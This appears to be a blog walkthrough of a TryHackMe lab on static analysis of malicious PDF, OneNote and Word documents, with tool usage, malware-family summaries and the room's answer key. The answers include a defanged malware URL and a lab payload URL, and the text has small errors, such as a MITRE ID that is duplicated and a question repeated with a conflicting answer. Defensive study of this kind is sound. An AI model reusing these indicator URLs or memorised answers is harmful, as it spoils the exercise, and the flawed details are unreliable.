In this post, we covered malware analysis techniques and tools to analyze PDF and Microsoft office documents. We used lab material from the room TryHackMe MalDoc: Static Analysis and also covered the answers for the tasks’ questions that are part of SOC Level 2 track.

In the digital era, documents are one of the most frequent methods for sharing information, serving purposes like reports, proposals, and contracts. Due to their widespread use, they have become a common target for cyber attacks. Malicious individuals can exploit documents to spread malware, steal confidential data, or conduct phishing schemes.

As a result, analyzing potentially harmful documents is a crucial aspect of any cybersecurity plan. By examining the structure and content of a document, analysts can detect potential risks and take actions to reduce them. This has become increasingly important as more companies depend on digital documents for storing and sharing sensitive data.

Please watch the video at the bottom for full detailed explanation of the walkthrough.

Malware Analysis Study Notes

Windows Active Directory Penetration Testing Study Notes

How PDF & Office Malwares are Delivered?

Spearphishing attachments are a common form of cyber attack aimed at specific individuals or organizations through well-crafted, personalized phishing emails. The goal of the attacker is to deceive the recipient into opening a malicious attachment, often containing malware, ransomware, or other harmful software. This allows the attacker to gain unauthorized access to the victim’s system, enabling them to steal sensitive data, compromise systems, or pursue other malicious objectives.

Advanced Persistent Threats (APT) refer to highly organized cybercrime groups or state-sponsored entities that frequently use spearphishing attacks to penetrate their targets’ systems. These APT groups leverage spearphishing attachments as a strategic method to circumvent security defenses and establish access to the target environment.

Malware families associated with Malicious documents

Emotet:

  • Technical details: Emotet is a banking trojan that is often distributed through malicious email attachments, typically in the form of Microsoft Word documents. Once installed, Emotet can steal sensitive information, such as banking credentials and email addresses, and it can also be used to download additional malware.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Emotet, which can be found at https://attack.mitre.org/software/S0367/.

Trickbot:

  • Technical details: Trickbot is a banking trojan that is often distributed through malicious email attachments and is known for its modular design, which allows attackers to add new functionality to the malware as needed. Trickbot has been used to deliver ransomware, exfiltrate data, and perform other types of malicious activity.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Trickbot, which can be found at https://attack.mitre.org/software/S0383/.

QBot:

  • Technical details: QBot is a banking trojan that is often distributed through malicious email attachments and is known for its ability to steal banking credentials and other sensitive information. QBot is also capable of downloading and executing additional malware and can be used to create backdoors on infected systems.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for QBot, which can be found at https://attack.mitre.org/software/S0385/.

Dridex:

  • Technical details: Dridex is a banking trojan that is often distributed through malicious email attachments and is known for its ability to steal banking credentials and other sensitive information. Dridex has been active since 2014 and has been one of the most prevalent banking trojans in recent years.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Dridex, which can be found at https://attack.mitre.org/software/S0384/.

Locky:

  • Technical details: Locky is a ransomware family that is often spread through malicious email attachments, typically in the form of Microsoft Word documents. Once installed, Locky encrypts the victim’s files and demands a ransom payment in exchange for the decryption key.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Locky, which can be found at https://attack.mitre.org/software/S0369/.

Zeus:

  • Technical details: Zeus is a banking trojan that has been active since 2007 and is often distributed through malicious email attachments. Zeus is known for its ability to steal banking credentials and other sensitive information and has been used in numerous high-profile attacks over the years.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Zeus, which can be found at https://attack.mitre.org/software/S0382/.

Petya:

  • Technical details: Petya is a ransomware family that is often spread through malicious email attachments and has been active since 2016. Petya is known for its ability to encrypt the victim’s entire hard drive, making it much more difficult to recover from than other types of ransomware.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Petya, which can be found at https://attack.mitre.org/software/S0367/.

PDF Document Analysis

A PDF (Portable Document Format) file is made up of a series of objects that are arranged in a defined structure. Gaining an understanding of this structure is crucial when analyzing or working with PDF documents. Below is a brief summary of the key components that make up the structure of a PDF file:

PDF Header: The header is the first line of a PDF file, containing a file signature and version number. The file signature is a specific sequence of characters that designates the file as a PDF, while the version number reflects the version of the PDF specification used to generate the document.

%PDF-1.7

PDF Body: The body of a PDF file consists of a series of objects arranged in a defined structure. Each object is marked with an object number and generation number, which serve to uniquely identify it within the document.

1 0 obj
<< /Type /Catalog
/Pages 2 0 R
>>
endobj
2 0 obj
<< /Type /Pages
/Kids [3 0 R 4 0 R]
/Count 2
>>
endobj
3 0 obj
<< /Type /Page
/Parent 2 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
>>
endobj
4 0 obj
<< /Type /Page
/Parent 2 0 R
/MediaBox [0 0 612 792]
/Contents 6 0 R
>>
endobj

PDF Cross-reference Table: The cross-reference table acts as a map, detailing the locations of all objects within the PDF file. It allows for efficient object retrieval within the document.

PDF Trailer: The trailer is the final section of a PDF file, containing key information about the document, such as the location of the cross-reference table, the file size, and any encryption or security configurations.

Source: TryHackMe

Tool: pdfid.py

Pdfid.py is used to summarise the objects/keywords found within the document.

Source: TryHackMe
  1. Objects: This document contains 18 objects.
  2. Stream: This document contains 3 streams that we need to examine.
  3. JS / JavaScript: This document contains 1 JavaScript and 1 JS instance.
  4. /OpenAction: This indicates that an action will be performed when the document is opened.. It could be running a JavaScript, downloading a payload, etc. Therefore, this object is worth examining.

Tool: pdf-parser.py

Pdf-parser.py is a very handy tool that is used to parse the PDF, search objects, filter, etc.

pdf-parser.py simple.pdf

We can use the search option to return only the objects that contain the OpenAction keyword

pdf-parser.py --search OpenAction simple.pdf
Source: TryHackMe

The output shows object 1, which contains the keyword OpenAction, which is then referring to object 6.

Showing object 6:

pdf-parser.py --object 6 simple.pdf
Source: TryHackMe

The above output shows object 6, which contains the JavaScript code. The last two results conclude that when this PDF document is opened, OpenAction will be triggered, resulting in the execution of the JavaScript code present in object 6.

Tool: peepdf

Peepdf is a tool designed for PDF analysis, particularly useful for identifying any malicious elements within a document. It also offers an interactive mode that allows users to directly interact with the objects in the PDF. To begin analyzing the document, you can use the command peepdf simple.pdf, which will provide essential information about the PDF file, such as its structure, potential vulnerabilities, and suspicious elements.

Using the interactive mode
This will give us an interactive interface

peepdf -i simple.pdf
Source: TryHackMe

Javascript Analysis

Box-js is a tool designed for analyzing and executing JavaScript code in a secure, controlled environment. Its primary purpose is to examine potentially malicious JavaScript files and observe their behavior without endangering the host system. By creating a sandboxed environment, Box-js allows the JavaScript code to run while being closely monitored, helping to identify malicious actions and understand its functionality.

box-js embedded-code.js

This tool runs the JavaScript in the controlled environment and returns the IOCs it finds during execution.

OneNote Document Analysis

OneNote, a widely-used note-taking and collaboration tool developed by Microsoft, enables users to create and manage digital notebooks that include various types of content, such as text, images, audio recordings, and file attachments. Files created in OneNote are saved with the extensions .one or .onenote.

Onedump is a stable tool used to extract and analyze OneNote documents.

python3 onedump.py invoice.one
Source: TryHackMe

Microsoft Office Document Analysis

Word Documents are files generated using Microsoft Word, a widely-used word processing program. These files commonly have .doc or .docx extensions and can include text, images, tables, charts, and various other types of content.

There are two main formats for Word documents:

Structured Storage Format
This is a binary format used by Microsoft Word versions 97-2003. Files in this format have extensions like .doc, .ppt, .xml, etc.
Office Open XML Format (OOXML)
Introduced in Microsoft Word 2007 and later versions, this format uses XML and is essentially a compressed file that contains all the document’s associated data. By changing the extension to .zip, these files can be unzipped to view their contents. Extensions for this format include .docx, .docm, and others.

What Makes a Document Malicious

Since documents can embed various elements, these can sometimes be leveraged for harmful purposes. Below are some examples:

  • Macros: Small VBA scripts embedded within Word documents. While designed to automate tasks, they can be misused to run harmful code, potentially installing malware, stealing information, or performing other malicious activities.
  • Embedded Objects: Word documents can include embedded items such as images, audio, video, or other files. These embedded objects could exploit vulnerabilities in the software used to open the document.
  • Links: Malicious Word documents may contain links leading to websites that distribute malware or phishing pages aimed at stealing user credentials.
  • Exploits: Some Word documents can include code that takes advantage of vulnerabilities in the software. These exploits might be used to install malware or gain unauthorized access to sensitive data.
  • Hidden Content: Word documents may also have hidden content not visible to the user, which could execute malicious actions.

Olevba extracts all the VBA objects it finds within the file and also shares the summary of the suspicious elements it finds

Room Answers | TryHackMe MalDoc: Static Analysis

From which family does the Locky malware belong to?
ransomware

What is the Sub-technique ID assigned to Spearphishing Attachment?
T1566.001

What is the flag found inside the JavaScript code?

THM{Luckily_This_Isn’t_Harmful}

How many OpenAction objects were found within the document?

1

How many Encoded objects were found in the document?
2

What are the numbers of encoded objects? (Separate with a comma)

15,18

What is the name of the dumped file that contains information about the URLs?

urls.json

How many URLs were extracted from JavaScript?
9

What is the full URL which contains the keyword slideshow? (defang the URL)

hxxp://aristonbentre[.]com/slideshow/01uPzXd2YscA/

What is the value used in the sleep function?

15000

The cURL command is being used to download from a URL and saving the payload in a png file. What is that file name?
index1.png

How many objects are found in the invoice.one document?

6

What is the author name of the document found during the analysis?

CMNatic

What is the author name of the document found during the analysis?

2

What is the URL extracted from the suspicious.doc file?

http://thmredteam.thm/stage2.exe

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles